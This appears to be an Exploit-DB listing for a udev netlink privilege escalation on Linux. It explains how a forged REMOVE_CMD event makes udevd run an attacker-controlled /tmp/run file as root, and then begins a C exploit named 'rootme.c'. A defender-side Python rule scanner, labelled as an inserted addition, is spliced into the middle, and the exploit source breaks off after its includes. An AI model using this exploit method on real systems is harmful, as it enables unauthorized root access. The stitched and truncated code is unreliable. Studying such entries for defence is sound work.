EDB-ID: 41886 | Author: Nassim Asrir | Published: 2017-04-15 | CVE: CVE-2017-7874 | Type: Local | Platform: Linux | Vulnerable App: N/A
/*
# Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# The full Research: https://www.facebook.com/asrirnassim/
# CVE: CVE-2017-7874
# Exp #
First of all, we need some basic information about udev and how it works.
The udev daemon is responsible for receiving device events from the kernel,
and these events are delivered to udev via netlink (a socket family).
You can read more about udev at: https://en.wikipedia.org/wiki/Udev
# Exploit #
The udev vulnerability results from a lack of verification of the netlink message source in udevd.
Read the lines in: /lib/udev/rules.d/50-udev-default.rules
All we need is this rule: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
This rule allows execution of arbitrary commands.
In our exploit we specify a malicious REMOVE_CMD, which causes privileged execution of the attacker-controlled /tmp/run file.
Get your udev version:
Execute: $ udevadm --version
// output: 232
Versions < 232 may also be vulnerable.
*/
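A defender-side check for the rule pattern described above, added here as an example and not part of the original exploit: it scans udev rules text for RUN directives whose program (or arguments) are taken from the event environment, which is what made the REMOVE_CMD rule dangerous once udevd accepted uevents from unprivileged netlink senders. The rules text is a constructed sample, and the regular expressions are an approximation of udev rule syntax, not udev's own parser.

```python
import re

# Constructed sample rules text (not a real file): it contains the line the page
# quotes from 50-udev-default.rules plus a few ordinary rules for contrast.
SAMPLE_RULES = """\
# constructed sample
SUBSYSTEM=="block", ENV{ID_FS_TYPE}=="ext4", GOTO="end"
ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
ACTION=="add", SUBSYSTEM=="net", RUN+="/lib/udev/net.sh"
ACTION=="remove", RUN+="/bin/sh -c 'echo %E{DEVPATH} >> /var/log/dev.log'"
LABEL="end"
"""

# Event-environment substitutions in udev rule values: $env{KEY} and %E{KEY}.
ENV_REF = re.compile(r'\$env\{[^}]+\}|%E\{[^}]+\}')
# RUN=, RUN+=, RUN{program}+= ...; capture the double-quoted value.
RUN_ASSIGN = re.compile(r'RUN(?:\{[a-z]+\})?\s*\+?=\s*"([^"]*)"')


def classify(run_value):
    """'program' when the executable itself comes from the event environment
    (the REMOVE_CMD case), 'argument' when only an argument does."""
    return 'program' if ENV_REF.match(run_value.strip()) else 'argument'


def risky_run_rules(text):
    """Return one dict per rule whose RUN value expands event-environment
    variables. Assumes one rule per line (no backslash continuations)."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        for m in RUN_ASSIGN.finditer(line):
            refs = ENV_REF.findall(m.group(1))
            if refs:
                findings.append({'line': lineno, 'rule': line,
                                 'refs': refs, 'kind': classify(m.group(1))})
    return findings


if __name__ == '__main__':
    for f in risky_run_rules(SAMPLE_RULES):
        print(f"line {f['line']}: {f['kind']} taken from environment {f['refs']}")
```

To audit a real system, read the files under /lib/udev/rules.d and /etc/udev/rules.d and pass their contents to risky_run_rules(); a 'program' finding means the event sender chooses what udevd executes.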
// gcc rootme.c -o rootme
// ./rootme
// segmentation fault
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15